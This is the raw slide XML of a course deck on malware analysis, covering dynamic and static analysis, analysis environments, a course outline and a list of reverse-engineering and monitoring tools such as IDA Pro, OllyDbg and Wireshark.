          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Disk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> File and registry accesses and alterations. Shows file and registry read, write, creations and deletes.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> All network traffic.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Required: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Controlled environment.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Monitoring tools (Wireshark, Process Monitor, FileDump, OllyDbg, etc.)</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7"/>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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="Google Shape;406;p37"/>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Static Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: examination of the machine code of the binary sample in order to further discover functionality and techniques used by the sample.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>The sample is not executed to monitor behaviour, it is the machine code in the binary file that is examined.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>it may be very time consuming and it may be very complex to perform.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>But static analysis is …. safe.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Tools: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Disassemblers or Debuggers (IDA Pro / OllyDbg)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="407" name="Google Shape;407;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143248" y="5661248"/>
            <a:ext cx="7802328" cy="8628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8"/>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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Google Shape;413;p38"/>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Tips</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Briefly study a malware before go deeply into it  since most of malwares are complex and huge.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>There is no common approach for analysing of all malwares. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Different tools &amp; techniques provide different analysis.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Different scenarios provides generate different analysis results.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Should do analysis by different ways and tools/techniques.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Both tools/techniques vs. malwares evolution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9"/>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Analysis Environment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Google Shape;420;p39"/>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Environment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Real: BootROM, Ghost, etc.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Virtual: VMWare, VirtualBox, etc.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: Windows, Linux</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Application Platform</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>.Net Framework</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Java Runtime Environment (JRE)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>…..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="30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4"/>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Course Outline</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="1124744"/>
            <a:ext cx="9036496" cy="5733256"/>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b="1" lang="en-GB"/>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Existence &amp; Motivation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Types of Malwares (Malicious software)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Goals of Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Surface </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Dynamic</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Static</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Malware Analysis Tools &amp; Techniques</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Virtual Machines (VMWare, …)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Obfuscation techniques</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Disassemblers and Debuggers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Monitoring tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Packer Detector &amp; Unpackers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Project </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>IDA Pro</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>OllyDbg</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-134619" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="1000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0"/>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Tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="Google Shape;426;p40"/>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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>IDA Pro: disassembler/debugger </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>OllyDbg: disassembler/debugger</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>PEview: file header analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>PEiD: File packer detector</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Dependency Walker: API, DLL explorer </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Wireshark: network protocol analyzer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Regshot: Registry</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Burp: proxy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ArpateDNS: DNS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
